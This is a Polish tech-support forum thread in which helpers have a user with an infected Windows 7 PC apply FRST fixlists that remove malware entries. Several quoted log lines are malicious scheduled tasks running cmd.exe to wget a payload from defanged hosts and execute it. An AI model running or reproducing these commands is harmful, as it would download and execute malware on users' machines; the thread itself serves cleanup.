Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

[Rozwiązano] Komputer laguje, zawiesza się - Przeglądarka się wyłącza, lagi, brak możliwości

KKK98 13 Cze 2018 19:25 1065 36
  • #1 13 Cze 2018 19:25
    KKK98
    Poziom 4  

    Witam. Jest to moj pierwszy post, jeżeli piszę w złym dziale, to przepraszam :)
    Od kilku dni mój komputer coraz bardziej laguje, nie da się w nic grać, każda gra to pokaz slajdów, ciężko też patrzeć w google, bo przeglądarka chodzi wolno, czasami też się wyłącza. Po wpisaniu w przeglądarce haseł typu antywirus, adwcleaner przeglądarka od razu się wyłącza. Skanowałem komputer adwcleanerem, ccleanerem, malwarebytes, niestety nic to nie pomogło. Komputer się nie przegrzewa, nie mam keyloggera, antywirus pokazuje, że wszystko jest w normie. W tej chwili nie da się nawet uruchomić adwcleanera, i cmd, da się to zrobić tylko w trybie awaryjnym. Miał ktoś podobny problem? Nie obejdzie się bez formatu? Z gory dzięki za wszystkie porady :)

    0 29
  • #3 13 Cze 2018 19:37
    KKK98
    Poziom 4  

    Próbowałem zainstalować FRST wczoraj, ale od razu wyrzuca mnie z przeglądarki, to samo dzieje się jak wpiszę hasło typu adcwcleaner, ccleaner. Mogę wykonać skanowanie w trybie awaryjnym? Inaczej tego nie zrobię :(

    0
  • #4 13 Cze 2018 19:47
    king1q2w
    Poziom 10  

    Patrzyłeś jaka wydajność jest podczas takich lagów? jaki stan procesora? ramu? może jakiś proces zabija stan komputera, wejdź w tryb awaryjny w trybie sieci i tam pościągaj różne programy do skanowania systemu , nie powiedziałeś też jaki masz system..

    0
  • #5 13 Cze 2018 19:51
    piotrkam1982

    Poziom 15  

    king1q2w napisał:
    Patrzyłeś jaka wydajność jest podczas takich lagów? jaki stan procesora? ramu? może jakiś proces zabija stan komputera


    HiJack,SpyBOT,ComodoIS - to może pomóc - tak jak przedmówca proponuje zajrzyj w procesy win.

    0
  • #6 13 Cze 2018 20:09
    KKK98
    Poziom 4  

    Patrzyłem, wydajność procesora nie przekracza 50%, ram chyba też ok. Skanowałem kilka rady programami, które wymieniłem wcześniej w trybie awaryjnym, i dalej to samo :(
    Komputer laguje, zawiesza się - Przeglądarka się wyłącza, lagi, brak możliwości

    Windows 7 Home Premium, 64 bit
    8 GB RAM
    Procesor: Intel i3 4160 3,6 GHz
    Karta graficzna: NVIDA GeForce 660 GTX
    Płyta główna: ASRock H81M-DGS

    0
  • #7 13 Cze 2018 20:38
    dt1
    Moderator - Komputery Serwis

    KKK98 napisał:
    Patrzyłem, wydajność procesora nie przekracza 50%, ram chyba też ok

    Zajęcie 25% to obciążenie jednego rdzenia na maxa. Wrzuciłeś tylko jeden z logów (FRST), a gdzie Addition?

    0
  • #9 13 Cze 2018 21:22
    lukaszd82
    Poziom 26  

    Masz w tym Win7 Service Pack 1? Czy bez Service Pack?
    Ten bluescreen z tym błędem stopu wiązał się z jakimś softem, ale już nie pamiętam co to było. Instalacja Service Packa 1 oraz poprawki z linka rozwiązywała problem w 90% przypadków.
    Link
    Drugim znanym mi przypadkiem, gdy komputer wyświetla ten bluescreen są kłopoty z HDD
    Link
    Link
    Profilaktycznie sprawdź kable SATA od dysków oraz ich zasilania.
    Przy okazji, jaki zasilacz siedzi w tym PC?

    No i przykład softu, który powodował błędy bez tej poprawki to np. AVAST:
    Link

    Czy instalowałeś ostatnio coś nowego?

    Tutaj jeszcze info na temat postępowania przy tym błędzie systemu:
    Link

    0
  • #10 13 Cze 2018 21:35
    krzychupar
    Poziom 40  

    Otwórz notatnik systemowy i wklej:

    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => -> Brak pliku
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => -> Brak pliku
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => -> Brak pliku
    ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => -> Brak pliku
    ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => -> Brak pliku
    ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => -> Brak pliku
    ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => -> Brak pliku
    ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => -> Brak pliku
    ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => -> Brak pliku
    ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => -> Brak pliku
    ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => -> Brak pliku
    ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => -> Brak pliku
    ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => -> Brak pliku
    ContextMenuHandlers1_S-1-5-21-1835959491-1952066776-416301505-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku
    ContextMenuHandlers4_S-1-5-21-1835959491-1952066776-416301505-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku
    ContextMenuHandlers5_S-1-5-21-1835959491-1952066776-416301505-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku
    Task: {27E987FC-06A0-43D9-86A9-AFCDC06A60FA} - System32\Tasks\{C978DF6E-B6D1-C634-9AC5-FB42458F9882} => C:\Users\user\AppData\Roaming\hznAYm.exe [2009-07-14] (Microsoft Corporation) <==== UWAGA
    Task: {60CAC64F-17E3-414E-858D-2465296DDC14} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://iashdb.in/index.php?data=XHeEsPHl4j;up;1421935139 & start cmd /R dat.bmp <==== UWAGA
    Task: {CB5A3191-3D7F-4035-8B39-852C2595188E} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://sdshdb.nl/index.php?data=91y0ikZusx;up;1421935149 & start cmd /R dat.bmp <==== UWAGA




    Task: {E388E3F3-02A7-4CE1-9213-B5B64AE4A734} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grogle.in/dat.bmp?data=dwjKMo97Ak;setup.exe;1421761500 & start cmd /R dat.bmp <==== UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-1835959491-1952066776-416301505-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-1835959491-1952066776-416301505-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    SearchScopes: HKLM -> DefaultScope {0644EE93-D778-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> DefaultScope {DAA9ECD9-1EAE-4688-A897-87F6664B112F} URL = hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=C011PL0D20160423&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> {DAA9ECD9-1EAE-4688-A897-87F6664B112F} URL = hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=C011PL0D20160423&p={searchTerms}
    BHO-x32: Brak nazwy -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> Brak pliku
    BHO-x32: Brak nazwy -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> Brak pliku
    FF Extension: (Coupon Time 1.0.1) - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\pe1hpf99.default\Extensions\{5663c04f-f294-4115-9114-b62be60538cb}.xpi [2015-08-03] [Przestarzałe] [Brak podpisu cyfrowego]
    FF Extension: (McAfee WebAdvisor) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2017-07-20] [Przestarzałe]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [Brak pliku]
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [Brak pliku]
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [Brak pliku]
    CHR Profile: C:\Users\user\AppData\Local\Google\Chrome\User Data\fikeselercutherjonocult [2018-06-13] <==== UWAGA
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]
    S3 mfeaack01; \Device\mfeaack01.sys [X]
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #11 13 Cze 2018 21:39
    dt1
    Moderator - Komputery Serwis

    Nie używaj losowych narzędzi, za chwilę będziesz miał większy problem z komputerem. Combofix nie jest polecany ze względu na brak możliwości kontrolowania jego działania i sporadyczne powodowanie cięższych problemów. W tej chwili po użyciu tego całego badziewia logi wygenerowane przez FRST mogą być już nieaktualne.

    Odinstaluj:
    McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.667.1 - McAfee, Inc.)
    McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.7.190 - McAfee, Inc.)
    Intel Security True Key (HKLM\...\TrueKey) (Version: 4.16.112.1 - Intel Security)

    Utwórz plik o nazwie fixlist.txt i zapisz go w tym samym folderze, w którym masz pobrany program FRST. Zawartość tego pliku ma być dokładnie taka:

    Code:
    HKU\S-1-5-21-1835959491-1952066776-416301505-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6501656 2014-10-23] (Piriform Ltd)
    
    HKU\S-1-5-21-1835959491-1952066776-416301505-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\System32\scrnsave.scr [11264 2009-07-14] (Microsoft Corporation)
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
    SearchScopes: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> DefaultScope {DAA9ECD9-1EAE-4688-A897-87F6664B112F} URL = hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=C011PL0D20160423&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> {DAA9ECD9-1EAE-4688-A897-87F6664B112F} URL = hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=C011PL0D20160423&p={searchTerms}
    BHO-x32: Brak nazwy -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> Brak pliku
    BHO-x32: Brak nazwy -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> Brak pliku
    BHO-x32: Brak nazwy -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> Brak pliku
    FF Extension: (Coupon Time 1.0.1) - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\pe1hpf99.default\Extensions\{5663c04f-f294-4115-9114-b62be60538cb}.xpi [2015-08-03] [Przestarzałe] [Brak podpisu cyfrowego]
    CHR Profile: C:\Users\user\AppData\Local\Google\Chrome\User Data\fikeselercutherjonocult [2018-06-13] <==== UWAGA
    CHR Extension: (Chrome Cleaner Pro) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ccjleegmemocfpghkhpjmiccjcacackp [2018-06-12]
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    StartMenuInternet: Google Chrome.MOLLOGOGA2R2BQOYYEBGYVM25A - D:\Google\Chrome\Application\chrome.exe
    OPR Extension: (bcjindcccaagfpapjjmafapmmgkkhgoa) - C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Extensions\mdddabjhelpilpnpgondfmehhcplpiin [2015-04-02]
    OPR Extension: (bcjindcccaagfpapjjmafapmmgkkhgoa) - C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Extensions\plbbhbkjiomcccgkhfpaenmplpkknnpj [2015-04-02]
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]
    S3 mfeaack01; \Device\mfeaack01.sys [X]
    C:\Windows\System32\Drivers\00805789.sys
    C:\Windows\System32\Drivers\012B7BC3.sys
    C:\Windows\System32\Drivers\061A38FA.sys
    C:\Windows\System32\Drivers\06A0576B.sys
    C:\Windows\System32\Drivers\08D9786B.sys
    C:\Windows\System32\Drivers\0CD54A83.sys
    C:\Windows\System32\Drivers\0DD47787.sys
    C:\Windows\System32\Drivers\148659D1.sys
    C:\Windows\System32\Drivers\16F52F23.sys
    C:\Windows\System32\Drivers\17247827.sys
    C:\Windows\System32\Drivers\1B204A3E.sys
    C:\Windows\System32\Drivers\1B7865AE.sys
    C:\Windows\System32\Drivers\1C207742.sys
    C:\Windows\System32\Drivers\1D152F05.sys
    C:\Windows\System32\Drivers\1E535DA1.sys
    C:\Windows\System32\Drivers\257077E2.sys
    C:\Windows\System32\Drivers\2DDA7953.sys
    C:\Windows\System32\Drivers\33BB779D.sys
    C:\Windows\System32\Drivers\386259F2.sys
    C:\Windows\System32\Drivers\3A014B43.sys
    C:\Windows\System32\Drivers\3A4D38CC.sys
    C:\Windows\System32\Drivers\3D0B783D.sys
    C:\Windows\System32\Drivers\46AD59AD.sys
    C:\Windows\System32\Drivers\4B5677F9.sys
    C:\Windows\System32\Drivers\4C4B1BBF.sys
    C:\Windows\System32\Drivers\4F7170DD.sys
    C:\Windows\System32\Drivers\5440399B.sys
    C:\Windows\System32\Drivers\54D072FF.sys
    C:\Windows\System32\Drivers\559C305C.sys
    C:\Windows\System32\Drivers\56497C90.sys
    C:\Windows\System32\Drivers\59A277B4.sys
    C:\Windows\System32\Drivers\5CB84A9D.sys
    C:\Windows\System32\Drivers\607F7C5F.sys
    C:\Windows\System32\Drivers\62F27854.sys
    C:\Windows\System32\Drivers\65C949A5.sys
    C:\Windows\System32\Drivers\67ED7770.sys
    C:\Windows\System32\Drivers\6C03775C.sys
    C:\Windows\System32\Drivers\713D7810.sys
    C:\Windows\System32\Drivers\7639772B.sys
    C:\Windows\System32\Drivers\7978307D.sys
    C:\Windows\System32\Drivers\7B5D5CB0.sys
    C:\Windows\System32\Drivers\7D654A00.sys
    C:\Windows\System32\Drivers\7F8977CB.sys


    ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} =>  -> Brak pliku
    ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} =>  -> Brak pliku
    ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} =>  -> Brak pliku
    ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} =>  -> Brak pliku
    ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} =>  -> Brak pliku
    ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} =>  -> Brak pliku
    ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} =>  -> Brak pliku
    ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} =>  -> Brak pliku
    ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} =>  -> Brak pliku
    ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} =>  -> Brak pliku
    ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} =>  -> Brak pliku
    ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} =>  -> Brak pliku
    ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} =>  -> Brak pliku
    ContextMenuHandlers1_S-1-5-21-1835959491-1952066776-416301505-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
    ContextMenuHandlers4_S-1-5-21-1835959491-1952066776-416301505-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku
    ContextMenuHandlers5_S-1-5-21-1835959491-1952066776-416301505-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} =>  -> Brak pliku

    Task: {0E9F2B01-88DF-4F91-912D-24E08E059134} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-10-23] (Piriform Ltd)
    Task: {27E987FC-06A0-43D9-86A9-AFCDC06A60FA} - System32\Tasks\{C978DF6E-B6D1-C634-9AC5-FB42458F9882} => C:\Users\user\AppData\Roaming\hznAYm.exe [2009-07-14] (Microsoft Corporation) <==== UWAGA
    Task: {5F5B2BDA-9B45-477E-B09A-B645EFF68CBB} - System32\Tasks\{DBC709C7-A1F4-4F16-80D2-46FB3183D755} => C:\Users\user\Desktop\adwcleaner_7.0.8.0.exe
    Task: {60CAC64F-17E3-414E-858D-2465296DDC14} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://iashdb.in/index.php?data=XHeEsPHl4j;up;1421935139 & start cmd /R dat.bmp <==== UWAGA
    Task: {67B804C4-9BC8-43E8-8DC9-B10EEEB908FB} - System32\Tasks\{09B6B9B7-FD68-174B-1276-0C249D1AD78F} => C:\Windows\aoOPUEe.exe [2009-07-14] (Microsoft Corporation)
    Task: {98BB0DCA-98F4-454F-B33F-CF09D221C984} - System32\Tasks\{7DD89883-C158-4F5F-B605-82D0934BB256} => C:\Users\user\Desktop\adwcleaner_7.0.8.0.exe
    Task: {CB5A3191-3D7F-4035-8B39-852C2595188E} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://sdshdb.nl/index.php?data=91y0ikZusx;up;1421935149 & start cmd /R dat.bmp <==== UWAGA
    Task: {E388E3F3-02A7-4CE1-9213-B5B64AE4A734} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grogle.in/dat.bmp?data=dwjKMo97Ak;setup.exe;1421761500 & start cmd /R dat.bmp <==== UWAGA
    Task: {EAF98FC7-DC57-4127-B4F1-F2AE00A338CC} - System32\Tasks\{E3AA5961-4D60-416B-8CAE-234018077BDC} => F:\start_game.exe [2014-09-19] ()
    Task: {FF3A68B2-D503-4A17-B08D-E3E3457635DC} - System32\Tasks\Odkurzacz => C:\Program Files (x86)\Odkurzacz\odkurzacz.exe [2017-01-18] (FranmoSoftware)
    Task: C:\Windows\Tasks\AdwCleaner_onReboot.job => E:\Piosenki\AdwCleaner.exe

    AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [134]

    FirewallRules: [{6A7B837C-8C5A-40C2-B0C7-C47DB66D42B6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{5036AE5B-60B3-4183-978F-F2F7A447A3AC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{A9F8A2D5-CC04-4D6C-B54C-FD6E1F2E7A81}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{31A5B9CB-1FD1-40BF-8BCD-F81E7A820492}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{893AD3CE-E601-4202-B1FC-7849FF860BBD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{4564E135-FDFC-43A7-A17B-F0DCD100F3A4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{B6776F0C-4C83-4AEA-8CA8-377420FBA34E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{F8C3F90C-0D30-4CDD-A680-4B696D122070}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{943404E1-B937-40AD-B414-C877EA266567}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{7AB09B8C-3A85-4FA4-AFFB-954EE46A789D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{AA780048-8952-4AF5-8F52-D29F33134CF1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{88FD4EC0-7C4C-4264-8E8E-CA5ABB8199CA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{326E5184-356E-4BA6-9F67-81B2A1210E1F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{96BD26D2-91B4-4725-BC57-CCC61C34AC88}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{57790DA6-FB5E-4BE8-8534-8C95B2EF1194}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{DD14B9A7-BB1F-44CB-B647-BD53996A23D0}] => (Allow) C:\Windows\SysWOW64\tracert.exe
    FirewallRules: [{821FF673-12D3-40E0-98FB-BFE495392A5B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{2FA79F11-5B12-4962-9E77-4FA0D19EA031}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{FC6127A7-E7E7-4252-A684-B5AC1DE297E3}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{C1F82145-E25E-4C26-86AD-AB71F90D0ADC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{90998DC8-C0F2-4705-8740-F9C9EC55ED4D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{1C8446CE-7BC3-4A64-ACC1-573057A2BD93}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{7B4B3024-8B58-49EA-8636-ECB8AD7AEDB9}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{34106953-FB15-4955-9838-32760949237A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{BEA0F9E4-D275-4EA8-A481-1B0C4155D652}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{716496D5-9A6D-42B1-957F-13D57023D0D5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{197AC19F-9190-4618-B90D-46A08562368A}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{0D8FBE6B-A3D1-4265-A3A2-27AE00343571}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{4081498C-3BF2-43D2-B0BD-98C97ACBACBF}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{52849DDD-8340-4E54-BFCE-D2239D1C51F5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{6B3B34BD-EB2C-4532-8316-B832C7F1A787}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{DEF8DEB4-FFE2-4094-8681-DDC3DF69AA9A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{CFF8706F-CD66-4160-BD6B-F53F8E9AE0F5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{8EDA3251-D5EF-44EA-AFA1-8BEE7F5A544F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{1AD05E25-8FF2-4E00-80BC-443E45F251EC}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{69E7BE2B-24D7-496D-BB1C-9FB97913DC13}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{20AE6780-C117-4C00-BDEA-600023B0A6D2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{9740FDF5-CA9A-4148-8781-010B86A57DEE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{B3C75193-9DF6-4D9B-816C-2DA2BABA1466}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{498C0F2F-56C0-4DC3-A435-B9C9CA1281AC}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{6E3EFA56-FBA7-4B58-8484-100AA1D3B037}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{3C887EA8-0F1B-47FF-B8A2-BE3E955F0652}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{8EAE2FD5-7F58-401D-A226-E52433BA8C8D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{E4CBCD8D-54CA-4E75-9223-84B9B3182AE0}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{FA94348A-3A78-4EAC-82A5-59F03E0363B9}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{EEFD6B68-BA31-41F0-9102-C1458B5DFCE8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{BADF9A41-C796-417D-B2D4-59D102689F41}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{92A666F0-47DD-4B3D-8E6D-E7D5463C965D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{876A1B3A-056B-4F0C-88C2-0DFC4FA1B41C}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{FE1CDA2D-CDCA-4264-A781-21F0D48D1B69}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{BD3989DB-81CD-4E4E-AF78-907397A37C37}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{6EABF4EE-0BF9-403A-9AF1-0BB73C70BEDA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{EBEC7315-7DC7-4D4E-9310-3B32A6C20A7E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{CF3CF4D6-9ADC-46FF-BFEE-29BE613F0458}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{3CEC83BB-AA77-4DF5-AFB0-03662ACD2EAD}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{85DCD06C-4F6B-4F2B-AC87-DEAAA92DEE6A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{29FE82EF-223C-4D8C-A35E-F7F961A9F11A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{F8E18242-5E1B-47E1-8AC6-BB37FCED0AF2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
